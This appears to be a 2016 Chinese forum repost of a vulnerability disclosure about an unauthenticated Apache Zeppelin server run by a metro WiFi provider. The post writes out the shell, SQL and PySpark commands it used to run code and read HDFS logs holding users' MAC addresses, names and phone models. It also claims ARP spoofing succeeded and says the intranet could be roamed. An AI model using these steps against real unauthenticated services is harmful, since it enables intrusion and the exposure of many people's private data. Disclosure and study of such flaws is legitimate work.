HanDs
管理员

[7月漏洞公开] 全国地铁wifi提供商再次沦陷(上亿用户资料及核心源码) 



#中考前最后一发
从源码看出这个wifi提供商供应了武汉,上海,北京等地的地铁wifi
数据库显示每小时连接的用户量达到70w以上,每小时流量高达20gb+(已成功arp欺骗)

详细说明:

**.**.**.**:8080/

zeppelin未设置访问权限,可以直接执行命令

code 区域
%sh
whoami



code 区域
%sql
show databases



可内网漫游,没有深入,不过hdfs上还有很多内部文件(财务报表,员工数据库)

漏洞证明:

屏幕快照 2016-05-22 下午4.08.58.png



屏幕快照 2016-05-22 下午4.09.31.png



屏幕快照 2016-05-22 下午4.21.26.png





显示2016/5/19 5点-6点的用户连接日志

泄漏mac地址,名称,手机型号

code 区域
%pyspark
rdd = sc.textFile("/data/ad.main/2016/05/19/05/")
print rdd.take(rdd.count())



屏幕快照 2016-05-22 下午4.39.48.png





数据(非高峰1小时):http://**.**.**.**:90/1.txt

修复方案:

打入内网


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
全国
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复